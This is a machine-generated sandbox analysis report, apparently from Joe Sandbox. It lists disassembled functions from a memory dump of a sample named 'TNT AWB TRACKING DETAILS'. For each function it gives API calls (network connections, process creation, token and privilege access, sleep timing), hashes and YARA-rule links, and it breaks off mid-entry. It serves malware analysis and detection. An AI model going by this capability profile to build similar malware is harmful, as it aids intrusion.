Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 13a9e70a1293ebf1333010e677130219ebd675bcea63da8dc12d78f215ad4fb0
Instruction ID: 37d38cc7011d9ed8f1f6ab7a5a5839a505f42d67e11adde92012891066aa9f3e
Opcode Fuzzy Hash: 13a9e70a1293ebf1333010e677130219ebd675bcea63da8dc12d78f215ad4fb0
Instruction Fuzzy Hash: 72216972E40109EBDB10DFA4CA49BFEB7B8EF44305F154069E644AB241EB38AE05CB90

Function 00AC098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00AC09AE

Part of subcall function 00AA5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00B07896,?,?,00000000), ref: 00AA5A2C
Part of subcall function 00AA5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00B07896,?,?,00000000,?,?), ref: 00AA5A50

_fprintf.LIBCMT ref: 00AC09E5
OutputDebugStringW.KERNEL32(?), ref: 00AF5DBB

Part of subcall function 00AC4AAA: _flsall.LIBCMT ref: 00AC4AC3

__setmode.LIBCMT ref: 00AC0A1A

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: 8849fd8e67c50ee7aefa5592cc55b00ee23ccba297bbefc29ad10b5d2760d104
Instruction ID: 1dccbfe7897d370308e441de4ced488f7f8129224a3a54ce0107c0dd6d210ad8
Opcode Fuzzy Hash: 8849fd8e67c50ee7aefa5592cc55b00ee23ccba297bbefc29ad10b5d2760d104
Instruction Fuzzy Hash: 6C112431A04208BFDB04B7B89C46EBE7BA89F4A360F21006DF205671C2EF704D4687A9

Function 00B11767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B117A3

Part of subcall function 00B1182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B1184C
Part of subcall function 00B1182D: InternetCloseHandle.WININET(00000000), ref: 00B118E9

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: b3402b37302e0074ad2be3ebdbbf0d8af231cad43cfef032fc11868dac4d369e
Instruction ID: 17dfaa2ec2c2bd391a67940063beb396b9f3b6e334da3b79d3b131d33f214469
Opcode Fuzzy Hash: b3402b37302e0074ad2be3ebdbbf0d8af231cad43cfef032fc11868dac4d369e
Instruction Fuzzy Hash: 0F21A471200605BFEB129F64DC41FFABBE9FF48710F50446AFB1196660DB71986197A0

Function 00B03A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00B2FAC0), ref: 00B03A64
GetLastError.KERNEL32 ref: 00B03A73
CreateDirectoryW.KERNEL32(?,00000000), ref: 00B03A82
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00B2FAC0), ref: 00B03ADF

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: c3f19b6cb4e3070d8ca1bbd8dc4c07b8f0500a0c52d68aa44211956be3a1f20f
Instruction ID: c7387588c06d93bdbd3e0964e8172d9a5b0844e8ad82559d07086b3090b085c3
Opcode Fuzzy Hash: c3f19b6cb4e3070d8ca1bbd8dc4c07b8f0500a0c52d68aa44211956be3a1f20f
Instruction Fuzzy Hash: 652180346082029FC310DF28C98586F7BF8EE56B64F104A69F499C72E1DB31DE46CB82

Function 00AFDCBE Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00AFF0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00AFDCD3,?,?,?,00AFEAC6,00000000,000000EF,00000119,?,?), ref: 00AFF0CB
Part of subcall function 00AFF0BC: lstrcpyW.KERNEL32(00000000,?,?,00AFDCD3,?,?,?,00AFEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00AFF0F1
Part of subcall function 00AFF0BC: lstrcmpiW.KERNEL32(00000000,?,00AFDCD3,?,?,?,00AFEAC6,00000000,000000EF,00000119,?,?), ref: 00AFF122

lstrlenW.KERNEL32(?,00000002,?,?,?,?,00AFEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00AFDCEC
lstrcpyW.KERNEL32(00000000,?,?,00AFEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00AFDD12
lstrcmpiW.KERNEL32(00000002,cdecl,?,00AFEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00AFDD46

Strings

cdecl, xrefs: 00AFDD3D

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 2a8315f64af0e94da3446cfac64dd0f7f9fbef2489b0d75a05c9dc547624e333
Instruction ID: 70bdc456f3731074e2c36aede0fbd4f5f9f3bdd2f4f6442555c3063daedbaa4f
Opcode Fuzzy Hash: 2a8315f64af0e94da3446cfac64dd0f7f9fbef2489b0d75a05c9dc547624e333
Instruction Fuzzy Hash: B511BE3A200309EFCB269FB4D845E7A77B9FF45750B40806AFA06CB2A0EF719851C791

Function 00AD50E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00AD5101

Part of subcall function 00AC571C: __FF_MSGBANNER.LIBCMT ref: 00AC5733
Part of subcall function 00AC571C: __NMSG_WRITE.LIBCMT ref: 00AC573A
Part of subcall function 00AC571C: RtlAllocateHeap.NTDLL(013E0000,00000000,00000001,00000000,?,?,?,00AC0DD3,?), ref: 00AC575F

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 7f5fef7110b30f5fe696e325da9e8672677cbf4e18ea80d15c14a878b6d43b35
Instruction ID: c935fb78f1970c1896c78264fdd1b70d4fddd0e3cac6f3f22a223675050b7092
Opcode Fuzzy Hash: 7f5fef7110b30f5fe696e325da9e8672677cbf4e18ea80d15c14a878b6d43b35
Instruction Fuzzy Hash: 0611A372D04A12AECF313FB4AD45B6E3BA8AB143A1B11462FF9069A390DE348D418790

Function 00B16369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00B07896,?,?,00000000), ref: 00AA5A2C
Part of subcall function 00AA5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00B07896,?,?,00000000,?,?), ref: 00AA5A50

gethostbyname.WSOCK32(?,?,?), ref: 00B16399
WSAGetLastError.WSOCK32(00000000), ref: 00B163A4
_memmove.LIBCMT ref: 00B163D1
inet_ntoa.WSOCK32(?), ref: 00B163DC

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: 1e0acf64eb46f30d1d8142c2bfa469fb605ab77b3edad939c77d426f278ffc8b
Instruction ID: 695e0398ed20b0022582a1b489f4dfc7d6d4a6dfb01a42a333b76e92718fdd81
Opcode Fuzzy Hash: 1e0acf64eb46f30d1d8142c2bfa469fb605ab77b3edad939c77d426f278ffc8b
Instruction Fuzzy Hash: DD115B32900109AFCB00FBA4DE86DEFB7B8AF09310B544065F506AB2A1DF30AE05DB61

Function 00AF8B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00AF8B61
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AF8B73
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AF8B89
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AF8BA4

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 38f35b5fbea113b0ba1757f5fdf172e2d973f2866129d2109a9ad9f4a6fc8482
Instruction ID: 73b6216bf9cbc028c6b78d0a828bc110b3cfb2b6b7624ec6ab7391b35462f7bc
Opcode Fuzzy Hash: 38f35b5fbea113b0ba1757f5fdf172e2d973f2866129d2109a9ad9f4a6fc8482
Instruction Fuzzy Hash: A1110679901218BFEB11DBA5C985EADBBB8EB48710F2040A5EA00B7290DA716E11DB94

Function 00AA1290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00AA2612: GetWindowLongW.USER32(?,000000EB), ref: 00AA2623

DefDlgProcW.USER32(?,00000020,?), ref: 00AA12D8
GetClientRect.USER32(?,?), ref: 00ADB5FB
GetCursorPos.USER32(?), ref: 00ADB605
ScreenToClient.USER32(?,?), ref: 00ADB610

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: dad8fd20b73c92ca9b203640a3c0f1bc0f73f2dabbbb00ec31d502d5b781a90b
Instruction ID: 21b2323b11111c5dd992dca40807f21b4485fb454fce39d4111b4cc591340968
Opcode Fuzzy Hash: dad8fd20b73c92ca9b203640a3c0f1bc0f73f2dabbbb00ec31d502d5b781a90b
Instruction Fuzzy Hash: 4F11F83950011AFBCB11DF98D985AFE77B8EB06301F500466F941E7291CB34AA56CBA5

Function 00B01142 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00AFFCED,?,00B00D40,?,00008000), ref: 00B0115F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,00AFFCED,?,00B00D40,?,00008000), ref: 00B01184
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00AFFCED,?,00B00D40,?,00008000), ref: 00B0118E
Sleep.KERNEL32(?,?,?,?,?,?,?,00AFFCED,?,00B00D40,?,00008000), ref: 00B011C1

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: d27373847a4e8831605f7cc8c287186e7978d8221b8c3492888a15d6e371d892
Instruction ID: af97baf8174fe7a2b04f73201a1879aa321f883fbe03e0c7317d61b346a36d01
Opcode Fuzzy Hash: d27373847a4e8831605f7cc8c287186e7978d8221b8c3492888a15d6e371d892
Instruction Fuzzy Hash: BA117031C0051DD7CF089FA9D884AEEBFB8FF09751F404495EA40B2280CB305561CB91

Function 00AFD831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00AFD84D
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00AFD864
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00AFD879
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00AFD897

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: fab1a527d668eeb7bddc5a708d7bc92f0b450160b794d1a2614037b1558df137
Instruction ID: 180cb2e18db58a0e25d8b252b52c055c5750f94c7db3b082a695772b60e32ef9
Opcode Fuzzy Hash: fab1a527d668eeb7bddc5a708d7bc92f0b450160b794d1a2614037b1558df137
Instruction Fuzzy Hash: 67115E75605309EBE3219F90DC08FA6BBBDEB00B40F108569B656D7150D7B0E5499BE1

Function 00AD6FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00AD6FDB

Part of subcall function 00AD76C2: __fltout2.LIBCMT ref: 00AD76EB

__cftog_l.LIBCMT ref: 00AD7001
__cftoe_l.LIBCMT ref: 00AD7033

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 1fa5680e174c3a20b173b1120409902eb39836c412b7bfcf3a5b89012f1fb860
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 4D01407244414ABBCF1A5F84DC01CED3F62BB18350F588456FE1A58271E636C9B1AB81

Function 00B2B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00B2B2E4
ScreenToClient.USER32(?,?), ref: 00B2B2FC
ScreenToClient.USER32(?,?), ref: 00B2B320
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B2B33B

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: f553507cfa63363f4b0c314580f83870c27647b1a600db8195804708ac89e7fa
Instruction ID: b717de28686e91622f9778fc01e5f9aef4e67086d3ac3aca7614208a705e1623
Opcode Fuzzy Hash: f553507cfa63363f4b0c314580f83870c27647b1a600db8195804708ac89e7fa
Instruction Fuzzy Hash: B6114675D0020AEFDB51CF99D4449EEBBF5FB08310F104166E914E3620D735AA55CF50

Function 00B2B635 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B2B644
_memset.LIBCMT ref: 00B2B653
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00B66F20,00B66F64), ref: 00B2B682
CloseHandle.KERNEL32 ref: 00B2B694

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: c25e0b0eef7377004ac3d05924f572287033cc840fbe8f64e4ec1f31c7b6c750
Instruction ID: 3191eefd889314f3fbefe64605ec68656708f7ab9117cc7fd250ab5edb99109f
Opcode Fuzzy Hash: c25e0b0eef7377004ac3d05924f572287033cc840fbe8f64e4ec1f31c7b6c750
Instruction Fuzzy Hash: F5F05EB25403007AF2116761BC16FBB7B9CEB18395F004030FA09E6192DFBA4C0087A8

Function 00B06BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00B06BE6

Part of subcall function 00B076C4: _memset.LIBCMT ref: 00B076F9

_memmove.LIBCMT ref: 00B06C09
_memset.LIBCMT ref: 00B06C16
LeaveCriticalSection.KERNEL32(?), ref: 00B06C26

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: 63898c8cf47d654b213784fb09009205cdaf6a18e401e1fdda09f81c2ed597c5
Instruction ID: 077df3f4c17fa3423209d614298b4029b73a69cdfe2b260106ae73928217cc89
Opcode Fuzzy Hash: 63898c8cf47d654b213784fb09009205cdaf6a18e401e1fdda09f81c2ed597c5
Instruction Fuzzy Hash: 76F0F47A100100ABCF116F95DC85E5ABF69EF49361F0480A5FE095F267DB31E911DBB4

Function 00AA2218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00AA2231
SetTextColor.GDI32(?,000000FF), ref: 00AA223B
SetBkMode.GDI32(?,00000001), ref: 00AA2250
GetStockObject.GDI32(00000005), ref: 00AA2258
GetWindowDC.USER32(?,00000000), ref: 00ADBE83
GetPixel.GDI32(00000000,00000000,00000000), ref: 00ADBE90
GetPixel.GDI32(00000000,?,00000000), ref: 00ADBEA9
GetPixel.GDI32(00000000,00000000,?), ref: 00ADBEC2
GetPixel.GDI32(00000000,?,?), ref: 00ADBEE2
ReleaseDC.USER32(?,00000000), ref: 00ADBEED

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: b72799de7045ce797f58c4ebe665869e927a17d540214c72c0b7bfe2d60f7e03
Instruction ID: 481e314966df7f98491b97b52352ae029e53e03842e691387537ee1c85836c3c
Opcode Fuzzy Hash: b72799de7045ce797f58c4ebe665869e927a17d540214c72c0b7bfe2d60f7e03
Instruction Fuzzy Hash: 90E06D32104245EADF315F68FC0DBE83F20EB15332F008376FA69990E18B7189A1DB22

Function 00AF8712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00AF871B
OpenThreadToken.ADVAPI32(00000000,?,?,?,00AF82E6), ref: 00AF8722
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00AF82E6), ref: 00AF872F
OpenProcessToken.ADVAPI32(00000000,?,?,?,00AF82E6), ref: 00AF8736

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
